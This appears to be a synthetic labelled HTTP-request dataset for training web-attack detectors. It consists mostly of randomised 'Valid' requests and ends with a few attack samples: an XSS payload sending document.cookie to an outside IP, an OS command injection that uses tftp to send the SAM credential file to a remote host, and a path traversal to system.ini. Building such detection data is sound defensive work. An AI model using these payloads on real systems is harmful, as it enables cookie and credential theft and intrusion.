GET /pi/t6LEiRc8sdrproxwnu/s@fb_f8IFXM00Iw1eQ/qM_1oGO/o5nypwuttl3/apitecIn/eRQ/otsebkwx2/beneetMledhcteno/eK4bchvY_-M8dt/s7ah.tiff?taycrte=ze%27x&eut7stn6lno=sFv-XWz2LlF&7sy@V59=7&QZQlsZuB=nneq6nzznig3rievr&er=mwWakWFhfi4&ci66mhR=s.3U8&qsamUqSiqbS2C=o3Hau5&nxcprgeefnmvsc=mahi14lyiHC&9aule=18293795&qfyVd4u=bt0aeaf HTTP/1.1
Host: 3.71.173.150
Connection: close
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: ltmpe=E8outfhr
Client-ip: 25.43.158.8
Cookie: 75G6NUISbin=bseNcstp9e;ryu=bs3epeueuaajaeNai;hreet=81580180;3DkZstdin@j=6
Cookie2: $Version="87"
Date: Sat, 31 Oct 09 07:55:14 CET
ETag: "4ZoXdfDu0q2fc1O652"
Expect: 100-continue
From: s8gwet@et8nit.cz
If-Modified-Since: Sat, 17 Apr 04 19:49:19 GMT
If-Unmodified-Since: Wed, 04 Mar 09 01:35:52 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6613
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: NTLM SXZlZHQ3dG9sZWFpb01lemU4c3NpcmVoQ3JubXNyYW9JTm5jZGg0bg==
Authorization: NTLM ZG8yeWVpYUVjZG1kZXIydHNpbnRub3JFYWF3UVN5aXVveGJ0bUZNbHRvblI=
Range: 69-8,627819-1352
Referer: /o4svh/6D3ac5s/dhoeie.cgi
TE: gzip;q=0.1,trailers
Trailer: Upgrade
User-Agent: Mozilla/8.9 (Machintosh; U; PPC Mac OS X 3.7; wo-5N; rv:4.5.3) Gecko/28030672
UA-CPU: MIPS
UA-Disp: 9753,204,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 1496x218
Via: 7.1 3.155.119.192, 6ohe/1.6 www.7Ttdtni.shtml
Transfer-Encoding: ilam; cihze=ejsT3
Upgrade: rhr/1.3, Smen/4.8, iZ2/9.9, 9env/2.8
Warning: 751 149.187.223.48:94314 "predIns" "Mon, 13 Feb 06 15:51:00 CET"
X-Forwarded-For: 86.182.5.47
X-Serial-Number: 2418413
----: ------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 21350
Start - Id: 32335
class: Valid
GET /cor/qnpmdianienip/chyeacDrieprDoerumr/uEkrwbiArthnsogngIla/dJTnHnZx.KO/iYK/AMgitnnyndlj30e0ch/NetsCumtiqsljUrgrAtr/eucozeaRrp1/enlaj.php4?vz=6pdxnsEttsdhoins&tyoldrbisdfelde=4&drap=oGP&e7twesvr=eafhuoj&t2ei8N=5931534957&0arIeldB5fhi=6ohhxA&Gregws4cwfud=ppirOta&Pwwse3utmhlK=423&zink=eexec&awhsno0nc9id=eenee&ur=nXctIgu8nm&v4maahgd=6407334&broaOfdtS=nH%402XruJTm HTTP/1.1
Host: 210.238.157.37
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-cyrillic;q=0.2, windows-1257
Accept-Encoding: deflate;q=0.9, compress;q=0.2, identity, compress, compress;q=0.6
Accept-Language: me7nursk-ee0tnwvi, orr0-kqaesat;q=0.0, Aea0-df2, lad0u-nurlwE;q=0.3
Cache-Control: only-if-cached
Client-ip: 44.81.83.243
Cookie: ois=ofIWSlSwbxb;ye8inetts=38;SyaA=8moenrv3auaostf3s
Cookie2: $Version="91"
Date: Thu, 25 Aug 05 23:20:51 CET
ETag: "7wBQ58KJo_lePfJqRvb"
Expect: 100-continue
From: uoia@eenManS.fr
If-Modified-Since: Sun, 30 Apr 06 13:55:33 GMT
If-Unmodified-Since: Fri, 06 Aug 04 17:27:27 UTC
If-Match: *
If-None-Match: "mMitNRp3Pz237K5"
If-Range: "J_31UVfYoAzNr615oU"
Max-Forwards: 253
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Basic TjBsMjJlOklhc21oc3V3
Authorization: Digest nonce
Range: 5394-,21859-42
Referer: http://www.wdjTTji.fr/ieuihbio/ftNa0/cpslcotc/intsTe8.rar
TE: gzip;q=0.0
Trailer: Via
User-Agent: Mozilla/8.1 (Windows; U; WinNT 6.9; ed-5f; rv:9.3.2) Gecko/04378335
UA-CPU: StrongARM
UA-Disp: 5576,9149,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 831x847
Via: 1.1 www.a8Scopro.gif:52015
Transfer-Encoding: gzip
Upgrade: eai0N0/8.3
Warning: 028 12.22.183.75 "TaWSt493r1l" 
X-Forwarded-For: 132.144.23.218
X-Serial-Number: 5125463883
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32335
Start - Id: 20807
class: Valid
GET /connectPEATT/oieat/zkICk/wsxmlQstyle1PUatObq_/UnOlVi2XGXJyP/5eorvgpU486ot.aspx?schneyAohue=da%25n&hsyifortsoay=600651&rteocx=no&2DweN=27300&4se3aieCboicn=1&0nruetq=9312056&mhd0e=5616&khoIiSrqeeoec=%25rgee%7Cg&nzdoxoihhtouom=Nl&ss3sD7see=nare3cnhyInpmoh&odhqtye=514&2ssmeeFxies=65 HTTP/1.1
Host: www.xelqhdu.net
Connection: ocqld
Accept: */*;q=0.9
Accept-Charset: windows-1251;q=0.5, x-mac-ce, windows-1251, windows-1254;q=0.1, shift_jis;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: min-fresh=16
Client-ip: 207.0.235.72
Cookie: w2ttr5nsisshc=rmA8CJG.;eosseia=ozAs;mkdnt6ttke=911331
Cookie2: $Version="95"
Date: Thu, 14 Jun 07 16:28:06 GMT
ETag: "FNK7ig4kkbloREE5"
Expect: 100-continue
From: 4cfhe2aa@tirclxt.org
If-Modified-Since: Mon, 11 Dec 06 03:26:35 CET
If-Unmodified-Since: Sat, 26 Jun 04 09:45:21 CET
If-Match: "jPy2E@@7KlMvuwAQ"
If-None-Match: "HQzcHCUHw7x4kO.FOPf"
If-Range: Wed, 14 Apr 10 04:54:04 CET
Max-Forwards: 6300
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: Basic dGh0Zmw6YWJhYWY=
Authorization: Digest response="0B1B4790DBaf0fD24A6F0dB18C0ca7A5"
Range: 468072-,7838-92,92-4796
Referer: http://awer.biz/erhe73i.php
TE: gzip,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/1.0 (Machintosh; U; Mac OS X 7.5; ie-ao; rv:5.2.1) Gecko/32123907
UA-CPU: x86
UA-Disp: 404,2413,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 7338x309
Via: 7.2 www.kamlY9ic.tiff, ig053/9.7 115.76.158.111
Transfer-Encoding: deflate
Upgrade: nm2Tie/2.4, a4heer/9.4, scnsH/7.8, kDsMm/2.1
Warning: 115 90.6.146.88 "UeaeoahrtqltoetUu" "Wed, 19 Jan 05 05:47:16 GMT"
X-Forwarded-For: 196.176.140.95
X-Serial-Number: 39917227024822129
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20807
Start - Id: 13216
class: Valid
GET /SlnrRhonoxa/olatcrrmg2etbtii/ohwe/7nsystemCo7_cvgroup bytnull_l/re-kpaTrNZflN5.gif? HTTP/1.1
Host: www.28raeueIaa.biz
Connection: close
Accept: video/mpeg;q=0.8, application/*, text/*;q=0.0
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 159.69.232.141
Cookie: nhnheydiTdri=FEjc;aayshEa=oeeaeafyeno5hpti;DzunionUpsvprocessing-instructionKy=mcnuutMsciy9;V1I9k=giv9hmc;eECcUgd=13B
Cookie2: $Version="29"
Date: Thu, 15 Apr 10 05:43:42 UTC
ETag: "ZANmXnakMXp8cfOM7"
Expect: dIf3ftsh=cioiNli;Khkkl7n
From: mmi5dv@7cu5saas.com
If-Modified-Since: Mon, 20 Jul 09 20:28:57 GMT
If-Unmodified-Since: Wed, 22 Apr 09 17:08:56 UTC
If-Match: "aPcgQOtL0c97CVVfA"
If-None-Match: *
If-Range: Sat, 14 May 05 15:18:02 CET
Max-Forwards: 473
MIME-Version: 4.3
Pragma: h6la=yil4Ei
Proxy-Authorization: Basic ZWlkZDoyY3JidDRtYQ==
Authorization: Digest algorithm=otaa
Range: 781398-
Referer: http://eesk.uk/fa4e/a1j1z.msf
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/0.3 (Machintosh; U; PPC Mac OS X 5.4; ti-th; rv:9.9.1) Gecko/72285067
UA-CPU: x86
UA-Disp: 026,187,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 3489x100
Via: 8.6 19.112.194.231, HTTP/7.5 222.72.226.95, iutra/1.3 www.of2md.css
Transfer-Encoding: gzip
Upgrade: tsts/0.5, eao/0.4, t6o/4.1, 2ibk/6.8, ihsqE/6.1
Warning: 250 6.79.0.164:77 "tiaaitulapnse9actS" 
X-Forwarded-For: 112.1.79.197
X-Serial-Number: 17158913018892
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13216
Start - Id: 11797
class: Valid
GET /pliwDhqtryntag5n2egi/s3pxc.Cnf-/hxN1MQ2fW1JQm/iH21GZp.jpg?Wmv-ISTtyDg=4 HTTP/1.1
Host: 205.93.250.186
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: iso-8859-7, us-ascii;q=0.7, iso-2022-kr;q=0.9
Accept-Encoding: identity, identity;q=0.9, identity;q=0.5
Accept-Language: 7-Ess
Cache-Control: max-age=559
Client-ip: 199.123.97.198
Cookie: lfesmn=Aste
Cookie2: $Version="32"
Date: Wed, 28 Apr 10 24:40:47 CET
ETag: "-b2jY7SXJLf5rJ4p"
Expect: 100-continue
From: tnsjx@nvlaoadtiu.st
If-Modified-Since: Fri, 23 Jul 04 10:47:11 GMT
If-Unmodified-Since: Thu, 12 Mar 09 21:44:12 GMT
If-Match: "7Bt1Q3ZTEc9q3oozMR"
If-None-Match: *
If-Range: Tue, 12 Jul 05 08:14:27 CET
Max-Forwards: 42
MIME-Version: 0.0
Pragma: pa=bn
Proxy-Authorization: otomt nIsr=ikrotu
Authorization: NTLM YmRlb3RzbXJzd3RldW13dHNmcmVvMW5paGVpZUFUZTJnamhmYW9tYWRuTWk=
Range: 0942-
Referer: http://www.pin0.be/leaihaf/ionsa/ntrC.dll
TE: chunked;q=0.9,chunked;q=0.0
Trailer: Accept-Charset
User-Agent: tbddivT_1 http://www.mtnc.uk
UA-CPU: x86
UA-Disp: 580,584,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0954x9922
Via: FTP/0.1 70.41.236.191
Transfer-Encoding: gzip
Upgrade: meE/0.7
Warning: 010 93.171.200.42 "zs5dwspM1loAab" 
X-Forwarded-For: 92.235.100.67
X-Serial-Number: 18749
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11797
Start - Id: 21601
class: Valid
GET /ttmp57OPKC.nsf?gserzhaxr8fneif=El&SxynnhsteaUiO9L=99&2asttrtswtecoto=nl3servicesmnea6ovbscript80h&El4yh4mgt3f=0741&j0=21688&mdocumentnmNpasswd=3289&obf=tZv_7UVy_&YeyfRr=wHXhOz&1jlzfCD%u=719415673&teatrmec=namcwrS2a%2B&twDwde=ivqDm&Ns9diyooe=iytoee63Xt HTTP/1.1
Host: 145.237.199.53
Connection: ch2bap
Accept: */*
Accept-Charset: windows-1258, iso-8859-8-i;q=0.2, gb2312;q=0.9, x-mac-cyrillic;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: max-stale=44150
Client-ip: 125.106.235.5
Cookie: Opdgcbxs.iframeEu=7fieJtRhe;thanarx=]msel;oorhcbB=oMZRIgE
Cookie2: $Version="7"
Date: Tue, 27 Apr 10 04:44:08 CET
ETag: "K9aD7ZQgnxoDv9t"
Expect: uuowo=eieb
From: tobWrwtn@esCei1hec.st
If-Modified-Since: Wed, 22 Dec 04 22:56:48 CET
If-Unmodified-Since: Sun, 22 Nov 09 18:48:36 UTC
If-Match: *
If-None-Match: "pFlEdte3_7DC_aS"
If-Range: "0WqLgNRzT1pd.ICivE@"
Max-Forwards: 263
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: ttRie mdrt=6Kielkrt
Authorization: Digest uri=http://www.Frrtshp.gov/xLEdAor/jxex7h8.txt
Range: 74322-,-826
Referer: http://hAtvi.be/1tnpwn/r0ttie/csmresE.asp
TE: gzip,trailers
Trailer: Cache-Control
User-Agent: Mozilla/1.7 (Machintosh; U; PPC Mac OS X 1.4; ei-ae; rv:9.8.3) Gecko/44386734
UA-CPU: x86
UA-Disp: 198,1596,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 592x4496
Via: 3.8 www.0sairef.htm
Transfer-Encoding: identity
Upgrade: 4erenr/4.2, dJoBc/5.1, ohere/8.1, 9Ut/5.9
Warning: 454 253.133.69.76 "ooerIseMeAi7r9coias" "Sat, 14 Oct 06 08:48:24 UTC"
X-Forwarded-For: 12.32.11.193
X-Serial-Number: 0418048557333038
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21601
Start - Id: 11554
class: Valid
GET /H-lB2node._execJ1BAG/liw/bSRZ7lib@ZAFe/sotweso/o0eSltr9yhxsssmznntd/us6Otdnx6tmis2hathis/5davie41/gcRvP4CIcBz/Hkjuocatgroup byiZNeS.png?sfotoan=aItbadh3tk5birwe7&bli8Mtiem=aaoeeppl&ao9efnie=4866&wysthdlBjshgd=289728&Tm2Huhn1=zYcuC.FGCZD&1rmeha03lntS=6243&ea=eedwt2Enmetad5 HTTP/1.0
Host: 220.173.252.52
Connection: keep-alive
Accept: application/*;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: compress;q=0.1, compress, identity;q=0.3
Accept-Language: eQ5hrs9m-sAsjocee;q=0.6, n32yt8E-rt, 3mniev-a, yo-oHATf, r-lsn6t;q=0.7
Cache-Control: no-cache
Client-ip: 20.170.229.99
Cookie: 1S3A4r=0598;ehdi3ers=765
Cookie2: $Version="8"
Date: Sun, 26 Sep 04 20:41:14 UTC
ETag: W/"X62uf8F9jchOzLTsj58"
Expect: aErq
From: nikAlis@eeus.com
If-Modified-Since: Sat, 09 Aug 08 09:04:31 CET
If-Unmodified-Since: Thu, 02 Oct 08 24:11:33 GMT
If-Match: "dnWgv3YYQHint73_"
If-None-Match: "50649.VYtdtyVRftNG"
If-Range: "FotIECYv8jgAkK9AW.8r"
Max-Forwards: 918
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Basic bHRpaHI6dGFIZVdvbA==
Authorization: NTLM YUEyb1R5c2lmZWV0bGFhZWxlWHVqYnFvanRwaHNhb2VlbWhjQWFlZE9v
Range: 8-
Referer: http://nUhenba.fr/tvrh.tiff
TE: deflate
Trailer: Referer
User-Agent: 43zTGRCiG http://www.qutbimls.de
UA-CPU: StrongARM
UA-Disp: 3136,3672,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 827x168
Via: atstfo/2.1 64.36.18.246, FTP/5.4 180.119.52.233, iitste/8.0 www.yoEdrw.html:863
Transfer-Encoding: identity
Upgrade: zgts/1.5, aer/7.2, ooao/3.9, 2auanu/9.2
Warning: 758 216.194.212.193 "pntdgN" "Wed, 30 Jun 04 20:02:29 UTC"
X-Forwarded-For: 175.39.106.169
X-Serial-Number: 24189
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11554
Start - Id: 16988
class: Valid
GET /2.eYOXbasNoWo/lfnMP9/@F/ZLuXftpL/yat9neheaooiieroraru.css?ch=txhl6yiikhgdSsr2&IimasHFs=10422&mtro1ae=Asaecopyst%28+&ntn=ok-b7TpWUY_g&Uan=athttn9aso&esOak=tNB&Kseshm=%7Es+dneERRfpluhome+78iy%28&ite=21563669&d9g=hmontenwrEo HTTP/1.0
Host: www.esrT.uk
Connection: enrBia
Accept: video/mpeg;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: deflate;q=0.6
Accept-Language: *
Cache-Control: no-cache
Client-ip: 171.127.105.157
Cookie: yyhloSci= ;iailssg=|4niframeru=g;hYseAmNlre8oSry=1342;tb8mv=3967909;aheERletmsi=os;axhuTo=2nks 
Cookie2: $Version="12"
Date: Mon, 25 Aug 08 16:43:49 GMT
ETag: W/"y96Y2OBz57MMDPMG"
Expect: 100-continue
From: tilh7o8@rkyx6lf.net
If-Modified-Since: Tue, 16 Jun 09 03:30:29 CET
If-Unmodified-Since: Fri, 17 Nov 06 16:17:27 CET
If-Match: "Y.owKOsxhLYoHm@-JjM"
If-None-Match: "EntZM43MFiSDFS2FjlL"
If-Range: Sun, 09 Apr 06 18:22:48 GMT
Max-Forwards: 5
MIME-Version: 0.9
Pragma: uyNoeR6h='nOrom'
Proxy-Authorization: Basic ZWVvaXNSbDplbG9kV2VhdA==
Authorization: Digest nc=1596bdD5
Range: -1680
Referer: /e7Iut4R/So6ilbhi/nlsir/h5E4Bd8/seldeoNp.wmn
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.3 (Windows; U; Win 9x 8.1; ta-oi; rv:6.5.6) Gecko/97681553
UA-CPU: x86
UA-Disp: 5788,856,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 366x7717
Via: 3.0 60.37.157.184
Transfer-Encoding: compress
Upgrade: xInLof/6.3
Warning: 325 113.145.246.23:44456 "TcfseuxEeh6hlbirt" 
X-Forwarded-For: 152.194.175.184
X-Serial-Number: 44944819
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16988
Start - Id: 24105
class: Valid
GET /ne1gin/MP--o2y/eV/adsNJdmk/5zet7tadeleteSZK7r/cCm6.EVfT7hQZ@H/cofooeo/im@jHkJ/B4eYG-bM.css?si7ehHpoecs=38&IGimgf9=Ae0llgsatzst&xrvl9eeiCosuyr=8467365&s45WlinkvF=%5Desd&lnsgfnIdtcc=anitu8ia&aowdxnoiN=eLx5G&Pvvrer7=anoin9rLinadS&nvbscriptfkXh2=5886&eiehi=%3Fes%3D&E1ohhtmvOe=rblftst+&e6nupenresbl=4624 HTTP/1.0
Host: www.Omkfi.biz:1993
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: iso-8859-3
Accept-Encoding: gzip, deflate, deflate
Accept-Language: e6nghl-i8rfsh, dropemiR-a;q=0.2, f5asr-ez;q=0.1, OCpb-caebw
Cache-Control: no-store
Client-ip: 120.174.30.121
Cookie: wsmpen=38;rkrm-9XU81=a2Sf3oR9;O8=r3yl;etihhc=5;ctocvieqmtsE9=ga;O5Eafategsrug=nkItat8eikstdrmasu
Cookie2: $Version="28"
Date: Mon, 04 May 09 11:09:14 UTC
ETag: "up1FPESAOB4b2.C_zxy"
Expect: tswe
From: Asrom2hL@mwusmln.it
If-Modified-Since: Mon, 24 Dec 07 02:48:32 UTC
If-Unmodified-Since: Fri, 23 Jan 09 04:52:10 CET
If-Match: *
If-None-Match: "AANv8fPyQ3Bpyj2MeJPT"
If-Range: "aT4S.VYPW5CWTGxMTYo"
Max-Forwards: 12
MIME-Version: 7.7
Pragma: 8AAk=uohsrnob
Proxy-Authorization: NTLM Yjc3NGFpUnJ0TWE2dGZKaGFjRWlsY3lpVHNkbHJ2cmVy
Authorization: Digest opaque="fgcenpgt"
Range: 05-009,-9713,654-967
Referer: http://www.eEafira.ch/geil4/Deho9eh.exe
TE: gzip;q=0.8,chunked;q=0.0
Trailer: Warning
User-Agent: Mozilla/7.9 (Machintosh; U; PPC Mac OS X 6.1; qg-da; rv:2.4.8) Gecko/60964776
UA-CPU: MIPS
UA-Disp: 176,3441,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 390x221
Via: FTP/4.9 www.u8nba.gif
Transfer-Encoding: nydfd
Upgrade: orayl/3.8, rnnt/3.2, ise/8.1
Warning: 539 38.106.69.86 "RmeeRevmr53usmX" "Fri, 31 Mar 06 18:40:16 GMT"
X-Forwarded-For: 147.32.251.83
X-Serial-Number: 3675108004232803
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24105
Start - Id: 13510
class: Valid
GET /iewkoTk8o/Pe3ieahinrqle/mNclhsTo6/Ii/Gztkt/1syg-03kZ/0wtnu5el/2wseeOul/ebx.pl? HTTP/1.1
Host: 235.95.161.218
Connection: fkaies
Accept: */*;q=0.0
Accept-Charset: x-mac-turkish;q=0.4, cp-932
Accept-Encoding: 
Accept-Language: d7-6ve6;q=0.4, meri4n-eeem0ot, Nrhtsdn-egqee;q=0.7
Cache-Control: max-age=4246
Client-ip: 180.68.206.0
Cookie: eidOwxt1E7oyegi=pjdzh;se6tN=amr Iee(~5=hr;\;RO=rls$
Cookie2: $Version="839"
Date: Tue, 12 Jan 10 22:28:51 CET
ETag: "8gV8sWEuE.WleVASL2z"
Expect: 100-continue
From: reyhi@itnouasdie.ch
If-Modified-Since: Sun, 10 Jul 05 09:30:20 GMT
If-Unmodified-Since: Wed, 05 Oct 05 24:02:10 GMT
If-Match: *
If-None-Match: "X3eO8Ek.gFTBsk_"
If-Range: "bBJdLEzjjp12Q@b"
Max-Forwards: 44
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest uri=/uult/hNAEdi/arteht.tiff
Authorization: Basic dEVyUjU6cmRkWXY3
Range: -96,3592-271
Referer: /htmn0s/2danid/df0toay.php
TE: chunked;q=0.7
Trailer: Upgrade
User-Agent: Mozilla/7.6 (compatible; bicsov; Win 9x; fltut0i)
UA-CPU: x86
UA-Disp: 1040,6000,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 912x6854
Via: FTP/8.0 www.osop.tiff, s7hf/4.1 www.whlG.gif
Transfer-Encoding: identity
Upgrade: anTia/3.2, i8A/9.8
Warning: 707 86.35.37.2 "9TdUnnt" "Mon, 08 Jan 07 05:09:18 UTC"
X-Forwarded-For: 43.46.247.235
X-Serial-Number: 43048175021
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 13510
Start - Id: 16532
class: Valid
GET /eesihielLi/ua8a5tvzy1d7hWdga/uECj/nZdWFA5F83zqX/h7/bT7/to7a/bUtoaijnaaetno7/hXZoMPh@d.jpeg? HTTP/1.1
Host: www.noddd.net
Connection: ruOofre
Accept: audio/*, video/*
Accept-Charset: x-mac-roman, iso-8859-8-i;q=0.7, euc-tw;q=0.8, euc-kr;q=0.0, x-mac-roman;q=0.6
Accept-Encoding: 
Accept-Language: o4a-qeZmr35, 3o-hsaus
Cache-Control: max-age=69
Client-ip: 243.52.208.161
Cookie: hex7tthnRehona=16263;Eepoebur=wrynai6lhh;0nemg=6278;giifwRsen2=biifO7m;@@FLJ@cG4sexec=t8Lha_;atj5elp1i=iDnTFc
Cookie2: $Version="6"
Date: Mon, 31 Aug 09 16:57:51 UTC
ETag: W/"mFqelyB_aK6x1TYMg"
Expect: dpMikS9s
From: 76ee@Emufnodv.uk
If-Modified-Since: Sat, 29 Jan 05 17:45:29 UTC
If-Unmodified-Since: Sat, 30 Dec 06 21:47:27 GMT
If-Match: *
If-None-Match: "eTY9QJVEJ1Ql@5WT3"
If-Range: Wed, 30 Jan 08 16:55:43 CET
Max-Forwards: 031
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: NTLM dHluaGlhcnVsc2FudWxBSWFEdWVlTHNyYWZtM3MyY2lSZWhvY2RobnI0bDFlbGl0
Authorization: ofbeli yiersi=52ieuui
Range: 53-224,9424-27
Referer: http://www.etfiS8.biz/aWr5/evlhng.html
TE: chunked;q=0.7,trailers
Trailer: If-Range
User-Agent: i08P_8r http://www.nrgdnWiw.net
UA-CPU: x86
UA-Disp: 439,238,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 599x133
Via: 6.9 90.158.130.132:76, Aeoi/4.4 www.swone.html:29, 0.2 www.err1.tiff:06
Transfer-Encoding: gzip
Upgrade: lwl/7.6, pratqs/7.3
Warning: 376 www.ycezutrm.jpg "nens" "Mon, 03 Mar 08 23:13:28 GMT"
X-Forwarded-For: 184.226.48.9
X-Serial-Number: 05592727151
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16532
Start - Id: 47966
class: XSS
GET /ltrrdycde/ynIvy133P32OxrOvqF/tE7e8at1snj.js?wgbafntlsdrntuu=nT%28t3group+bykq+o+R&eyhYeo7psnps0r=18&7optayLOoiJO0U=dC_2pqTqne1k&aa=%27&rrrfespa=6571&zghin9tdeesdtu5=ZsDblnpwtNdm&OBRali=%5Dkttazaeymc%24e&LldeleteWHgbFc=ijdt%3D+tmpndusr6positionntnss&sti=oeriimguvtn%2Fslis&izielrOhetH8rsf=5%7Ewatmpid%5C4cep+%3C&7i=5258&iaereee8tzE=%26%7B%5Bwindow.open%28%27http%3A%2F%2F53.16.120.112%2Felar.asmx%27%2Bdocument.cookie%29%3B%5D%7D%3B&iapaetmiIien=1&ep=eLw_0.Q HTTP/1.1
Host: 158.57.47.11:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: max-stale=687
Client-ip: 231.93.232.112
Cookie: yiipnen=2dmNce0u(y
Cookie2: $Version="96"
Date: Thu, 07 Jun 07 04:07:56 CET
ETag: "09Q5lWaU@8rfp_chN"
Expect: wfi0bT8t=li0ate
From: isoa@fisS8tee.org
If-Modified-Since: Fri, 10 Apr 09 05:30:48 GMT
If-Unmodified-Since: Mon, 29 Nov 04 11:26:06 CET
If-Match: *
If-None-Match: "x_fmekkz9XmgoSr4mBbO"
If-Range: *
Max-Forwards: 6295
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: cdaead o0tyni=dtuinus
Authorization: Basic aWF0OGI6cnRxZnNjaHI=
Range: 0673-2,5-476336
Referer: http://9tih.net/iaq2/nuekIh.ace
TE: gzip,trailers,trailers
Trailer: Accept-Charset
User-Agent: oock (dCVwKnj; mn74QoQC; tkH7_wJZVK; uMA_iUi; h.UPwJ0AwK)
UA-CPU: 68000
UA-Disp: 533,4650,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3364x532
Via: HTTP/0.6 154.251.187.152, 8.2 www.narpnnt7.jpg
Transfer-Encoding: gzip
Upgrade: rtapt1/5.2, rgc8o/0.8, sdqf/6.2, htnEe/1.1
Warning: 193 185.105.110.73:7 "etrva5uwtemespwn" "Wed, 04 Oct 06 16:34:42 CET"
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 546551972
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 47966
Start - Id: 44567
class: OsCommanding
POST /8-s0bx1roZ-Y9gdlv/tA0/0tkradm/ac/pvljw60ropetc1fjmnA/udonaea/l4beigidhUesawmMe/eut8da/wiQ2MsCOvr.php? HTTP/1.0
Content-Length: 165
Content-Language: la,oy
Content-Encoding: deflate
Content-Location: /ssrdLi0/toslRwil.jsp
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 26 Sep 09 16:27:59 UTC
Host: www.8sleti.gov
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: oslw4e-cbhoyD;q=0.8
Cache-Control: min-fresh=99
Client-ip: 10.34.240.53
Cookie: deCahD5sl=e8ut7aylsil5oetah;rsiNisNu8ax=ile;zpwet8ey5itra=cPKwHTw0MDT;.djsUkW8documentU3=34;in=tahttps;Ze_Xgopenbqf=adp8olR
Date: Sun, 21 Feb 10 03:10:28 GMT
ETag: "Pdu5B-rYB0AW_8GO"
Expect: uwsaltSm=5myteE;eo7otdz=thwSy7x0
If-Modified-Since: Sun, 03 Apr 05 07:27:05 CET
If-Unmodified-Since: Wed, 06 May 09 12:33:04 GMT
If-Match: *
If-None-Match: *
Max-Forwards: 28
MIME-Version: 1.5
Pragma: no-cache
Authorization: Basic dGJya3R3aGg6cEhpNWR0
Referer: http://mt1oFr7f.gov/Etnisn/t4qnl/odthett.mdb
TE: gzip;q=0.4
User-Agent: Mozilla/2.4 (Machintosh; U; PPC 9.1; rr-et; rv:3.8.6) Gecko/83727634
Via: FTP/5.6 178.17.91.193, HTTP/6.1 184.42.102.206, 9.3 www.mceleeS.htm
Transfer-Encoding: compress
X-Forwarded-For: 91.169.45.106

OSprocessing-instructionqQwindow.open8y=etrilaaierre8&onhi35ogProo=117.142.141.166|   tftp   -i   151.99.219.97 PUT sam._&KTpasswdqtDpz=465&vijetTcxr=otieseeejkcLR

End - Id: 44567
Start - Id: 36185
class: PathTransversal
GET /lf0neeripmTm6Rosyso/n3aA4I77OHP/gvZ6I/ulrTnAB1Eeaeuita/0nelvuwbpeiisaloe/t-c/abieqnn3j2aaevTbvza/neDrri.php4?rkmpno=06cZirx9Eiite&RxS2img@rcpYRac=suTeanyezAboot.inip&cjCs7=..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&CoqqK=9&5@RCc@V.=isamrtinput&tkrmbtc=0_ikdJc9&hq5ea1btedo=batt&iel=7r7feera&-oFp3lWHGkX=%27jinsertn1sR%25ei%5D%27+a+4&iqronwsoebn=erto&anpnakStaenhah=r&ind9=o HTTP/1.0
Host: www.neiuar.uk
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-stale=09
Cookie: ht=dSEQ
